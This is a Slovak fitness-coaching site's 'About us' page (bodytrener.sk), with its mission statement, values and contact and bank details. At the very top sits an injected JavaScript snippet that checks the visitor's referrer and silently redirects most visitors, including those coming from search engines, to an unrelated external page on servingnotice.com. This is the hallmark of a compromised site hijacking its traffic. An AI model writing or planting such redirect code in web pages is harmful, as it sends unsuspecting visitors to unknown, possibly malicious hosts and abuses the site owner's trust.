var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; O nás | www.bodytrener.sk

O nás

Vznik tejto stránky

Prečo sme sa rozhodli založiť bodytrener.sk?

Ak by sme spočítali množstvo obéznych ľudí a ľudí s nadváhou na Slovensku, zistili by sme, že je ich až okolo 75%. Až 87% ľudí na Slovensku je nespokojných so svojo postavu. Hlavne z týchto dôvodov sme vytvorili bodytrener.sk, chceme tento trend zmeniť.

Zostavujeme tréningy a jedálničky na mieru aby ste mohli naberať svaly, chudnúť tuk, rysovať telo, zvyšovať silu  a kondíciu.

Veľa ľudí by rado zmenilo svoje telo, ale nevie ako. Na stránkach, fórach a od trénerov počujete rôzne rady, ktoré sa často nezhodujú a navzájom si protirečia. Náš tím pozostáva s vyškolených pracovníkov, ktorí niekoľko rokov zbierajú skúsenosti a rady od trénerov a skúšajú všetko na vlastnom tele.

Čo chceme dosiahnuť?

Radi by sme našimi radami, tréningami a jedálničkami zmenili telo tisícom ľudí. Sme zdrojom večkého množstva kvalitných a overených informácii, tieto informácie chcem posúvať ďalej. Staňte sa tým čím chcete byť. S nami to dokážete !

Pre koho sú naše služby určené?

Naše služby sú určené všetkým ľudom, ktorí chcú zmeniť svoju postavu a sú pripravení to uskutočniť. S našimi radami nielen zmeníte svoje telo, ale zlepšíte aj zdravie a imunitu. Zmeňte sa, ste na správnom mieste!

Na našich zákazníkoch si ceníme

Ceníme si rozhodnutie zmeniť sa

Veľa ľudí si uvedomuje, že nie je spokojných so svojím telom a chcú niečo s tým robiť. S nadváhou prichádzajú aj zdravotné riziká, ktorým môžete s nami predísť. Ceníme si každé rozhodnutie, ktoré Vám zmení telo. Postaráme sa o všetko aby ste mohli dosahovať Vaše ciele.

Ceníme si odhodlanie

Počas procesu dosahovania cieľov môžete stratiť motiváciu. Iba skutočné odhodlanie prekoná všetky prekážky a vy dosiahnete vytúžený cieľ. Musíte svoje telo motivovať aby ste všetko zvládli. Ceníme si odhodlanie, ktoré zmení Vaše telo!

Ceníme si Vaše komentáre a názory

Našim cieľom je zmeniť telá tisícom ľudí. O to viac si ceníme zákazníkov, ktorí sú ochotní podeliť sa o ich úspechy s ostatnými. Vaše komentáre a názory môžu prispieť k rozhodnutiu ľuďom zmeniť svoju postavu. Staňte sa človekom, ktorý pomáha meniť ľudí k lepšiemu :)

Tím bodytrener.sk

Potrebujete pomoc?

Adresa:
Bodytrener.sk - Patrik Barčák
Za kalváriou 667/18
02942 Bobrov

Pracovná doba:
Pon – Ned
10:00 – 22:00

E-mail: info@bodytrener.sk
Telefón: +421 910 448 689

Bankový účet:
IBAN: SK1111000000002938482513
Swift: TATRSKBX

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku